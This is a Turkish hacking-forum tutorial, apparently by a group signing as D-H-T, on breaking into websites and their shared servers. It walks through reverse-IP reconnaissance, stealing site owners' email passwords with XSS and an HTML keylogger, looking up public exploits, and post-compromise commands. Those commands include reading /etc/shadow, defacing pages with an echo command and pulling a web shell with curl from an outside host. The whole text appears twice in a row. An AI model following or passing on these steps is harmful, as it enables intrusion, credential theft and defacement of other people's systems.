İlk Once Hedef Siteye İliskin Bilgileri Alabilicegimiz Siteleri Yazalım :
http://whois.sc/hedefsite.com - Bu Siteden Hedef Domainin Makine İp,Ns,Domainin Alınıs ve Bitis Tarihlerini Gorebilirsiniz.Ornek: Megaturks.net
http://whois.webhosting.info/hedefsite.com - Bu Sitemizden'de Hedef Sitemiz İp'si İle Aynı Serverda Bulunan Sitelerin Listesini Alabiliriz.Tabi bu Verdigim İki Adres Dısında İki Tane Daha İsinize Yarayacak Yer Var.
http://news.netcraft.com Bu Sitemizden Resimde Anlattıgım Bılgılerı Alabılırsınız.
RESİM 1 :
RESİM 2 :
http://www.e-dns.org Son Olarak Bu Sitemizden Bahsediyim Sitede İlk Anasayfada Domain Whois yani Ns,ip,email vb.. Bilgileri Verir Reserve İp Kısmına Tıklarsanız.Sitenin Baglı Oldugunu makine yani serverdaki Siteleri Listeler Diger Verdigim Sitelere Nazaran Bu Sitemiz Daha Kapsamlı Olabilir ama Yinede Diger Siteleride Kosullara Gore Kullanınız
Neler Yapmalı ?
1) Bilgilerimizi Elde Ettikten Sonra Sıte Lıstemizle İslem Yapalım Oncelikle İsterseniz Tüm Listeyi Rfi Tarayıcı Programlara Atıp Acık Listenizle Taratma Yaptırabilirsiniz.Bu İslevi Goren Programlar Piyasada Mevcut.
2) İsterseniz Serverdaki Sitelerin Kendi Whoislerine Bakıp Domain Mailini Ele Gecirip Host Sifrelerine Ulasabilrisiniz.Bunun icin Yontemler;
Snifferla Xss Yontemi Yahoo - Gmail - Linuxmail - Hackermail -Superonline ve Mynet Hesaplarında Xss Acıgı Mevcut Bazıları Paylasılmadı ama Zamanla Megaturks'te Vericem.
Veya Sitede Paylasımını Yaptım HTML Keylogger Yapımı Sizi Sonuca Ulastırabilir Hedefin Mailine Atıp Tıklattırıp Tüm Sifrelerine Ulasabilirsiniz.
3)Site Listesindeki Siteleri tek tek Yada Scriptlerinde Acık Olabilicegine İnandıklarınızı milw0rm Securitydot.net gibi Sitelerden Guncel Acıklarına Bakıp Suncuya Girme Yollarına Gidebilirsiniz.Xss Sql RFİ Tarzı Acıklarla..
Hedefe Giris
Windows Yapılı Sunucular
Sunucuya Girdiginizi Varsayarsak Windows Yapılı Sunucularda Safe Mode: ON İse Kullanmanızı Tavsıye Edecegım Zehir Veya Benzeri Shellerdir.Dizin Gecmiyorsa Yapacagınız En Mantıklı Sey Program Files Kısmına İnmek Olur Burada Herhangi Bir Ftp Programı Kurulumu İnceleyiniz.Bilmeyen Arkadaslara Yazıyorum Windows Sunuculara Shelle Girdiginizde Yapıları Xp İle Aynıdır.Kurulu Ftp Programı varsa Emin Olun Ftp Logları Bi Yerde Vardır.Baska izleyeceginiz Yol İse Sudur
RESİM 1 :
Resim 2 :
Windows Sunucularda Guvenligi Asmanın Yolları Kısıtlıdır Ama Zamanla Onlarıda Paylasırız.Lınux Kadar Bypass ve Root Olunması Kolay Degıldır.
Linux Yapılı Sunucular
Linux Sistemi Php İcin Cok İyi Olmasına Karsın ve Saldırılara karsı Daha Cok Korumaları Olmasına Ragmen Shelle Girildiginde En Cok Darbe Yiyen Sunucular Linuxlerdir.Kullanabiliceginiz Basit Komutlar;
cat /etc/shadow - Sunucudaki Site Sifreleri Saklıdır %90 Perm Vardır
cat /etc/passwd - Sunucudaki Kullanıcıları Listeler
/var/named - Sunucudaki Siteleri Listeler
/var/cpanel - Cpanel Loglarını Verir
/var/mail - Sunucudaki Kullanıcıları Listeler
/tmp - Linuxte yazma İzni En Cok Bulunan Klasor
/etc/vdomainaliases - Hem Kullanıcıları Hemde Site Adreslerini Listeler
echo Hacked By ALEMCi devilhackerteam.0uu.net >/home/sıte/public_html - Echo Komutu Sunucuda Hızlı Bir sekilde Bazı
perm li Dosyalara Bile Uyarınızı Basmaya Yarar
curl -o shell.php http://www.site.com/shell.txt - Bazı Sunucularda Klasorlere Normal Upload Yokken Bu Komutumuzla Shell İmizi cekebiliriz.
Safe Mode: ON ve Disable Functionlarla Fonksiyonları Durdurulmus ve Engellemis Linuxlerde Safe Mode : ON Bypass ın nasıl yapıldığını hem bazı konulardada anlattık
özellikle shell kullanmayı bilmiyosanız bu konudan önce sitede açmış olduğum Professıonal RFI adlı konuda bir RFI uzmanı olabilirsiniz
D-H-T
http://whois.sc/hedefsite.com - Bu Siteden Hedef Domainin Makine İp,Ns,Domainin Alınıs ve Bitis Tarihlerini Gorebilirsiniz.Ornek: Megaturks.net
http://whois.webhosting.info/hedefsite.com - Bu Sitemizden'de Hedef Sitemiz İp'si İle Aynı Serverda Bulunan Sitelerin Listesini Alabiliriz.Tabi bu Verdigim İki Adres Dısında İki Tane Daha İsinize Yarayacak Yer Var.
http://news.netcraft.com Bu Sitemizden Resimde Anlattıgım Bılgılerı Alabılırsınız.
RESİM 1 :
RESİM 2 :
http://www.e-dns.org Son Olarak Bu Sitemizden Bahsediyim Sitede İlk Anasayfada Domain Whois yani Ns,ip,email vb.. Bilgileri Verir Reserve İp Kısmına Tıklarsanız.Sitenin Baglı Oldugunu makine yani serverdaki Siteleri Listeler Diger Verdigim Sitelere Nazaran Bu Sitemiz Daha Kapsamlı Olabilir ama Yinede Diger Siteleride Kosullara Gore Kullanınız
Neler Yapmalı ?
1) Bilgilerimizi Elde Ettikten Sonra Sıte Lıstemizle İslem Yapalım Oncelikle İsterseniz Tüm Listeyi Rfi Tarayıcı Programlara Atıp Acık Listenizle Taratma Yaptırabilirsiniz.Bu İslevi Goren Programlar Piyasada Mevcut.
2) İsterseniz Serverdaki Sitelerin Kendi Whoislerine Bakıp Domain Mailini Ele Gecirip Host Sifrelerine Ulasabilrisiniz.Bunun icin Yontemler;
Snifferla Xss Yontemi Yahoo - Gmail - Linuxmail - Hackermail -Superonline ve Mynet Hesaplarında Xss Acıgı Mevcut Bazıları Paylasılmadı ama Zamanla Megaturks'te Vericem.
Veya Sitede Paylasımını Yaptım HTML Keylogger Yapımı Sizi Sonuca Ulastırabilir Hedefin Mailine Atıp Tıklattırıp Tüm Sifrelerine Ulasabilirsiniz.
3)Site Listesindeki Siteleri tek tek Yada Scriptlerinde Acık Olabilicegine İnandıklarınızı milw0rm Securitydot.net gibi Sitelerden Guncel Acıklarına Bakıp Suncuya Girme Yollarına Gidebilirsiniz.Xss Sql RFİ Tarzı Acıklarla..
Hedefe Giris
Windows Yapılı Sunucular
Sunucuya Girdiginizi Varsayarsak Windows Yapılı Sunucularda Safe Mode: ON İse Kullanmanızı Tavsıye Edecegım Zehir Veya Benzeri Shellerdir.Dizin Gecmiyorsa Yapacagınız En Mantıklı Sey Program Files Kısmına İnmek Olur Burada Herhangi Bir Ftp Programı Kurulumu İnceleyiniz.Bilmeyen Arkadaslara Yazıyorum Windows Sunuculara Shelle Girdiginizde Yapıları Xp İle Aynıdır.Kurulu Ftp Programı varsa Emin Olun Ftp Logları Bi Yerde Vardır.Baska izleyeceginiz Yol İse Sudur
RESİM 1 :
Resim 2 :
Windows Sunucularda Guvenligi Asmanın Yolları Kısıtlıdır Ama Zamanla Onlarıda Paylasırız.Lınux Kadar Bypass ve Root Olunması Kolay Degıldır.
Linux Yapılı Sunucular
Linux Sistemi Php İcin Cok İyi Olmasına Karsın ve Saldırılara karsı Daha Cok Korumaları Olmasına Ragmen Shelle Girildiginde En Cok Darbe Yiyen Sunucular Linuxlerdir.Kullanabiliceginiz Basit Komutlar;
cat /etc/shadow - Sunucudaki Site Sifreleri Saklıdır %90 Perm Vardır
cat /etc/passwd - Sunucudaki Kullanıcıları Listeler
/var/named - Sunucudaki Siteleri Listeler
/var/cpanel - Cpanel Loglarını Verir
/var/mail - Sunucudaki Kullanıcıları Listeler
/tmp - Linuxte yazma İzni En Cok Bulunan Klasor
/etc/vdomainaliases - Hem Kullanıcıları Hemde Site Adreslerini Listeler
echo Hacked By ALEMCi devilhackerteam.0uu.net >/home/sıte/public_html - Echo Komutu Sunucuda Hızlı Bir sekilde Bazı
perm li Dosyalara Bile Uyarınızı Basmaya Yarar
curl -o shell.php http://www.site.com/shell.txt - Bazı Sunucularda Klasorlere Normal Upload Yokken Bu Komutumuzla Shell İmizi cekebiliriz.
Safe Mode: ON ve Disable Functionlarla Fonksiyonları Durdurulmus ve Engellemis Linuxlerde Safe Mode : ON Bypass ın nasıl yapıldığını hem bazı konulardada anlattık
özellikle shell kullanmayı bilmiyosanız bu konudan önce sitede açmış olduğum Professıonal RFI adlı konuda bir RFI uzmanı olabilirsiniz
D-H-T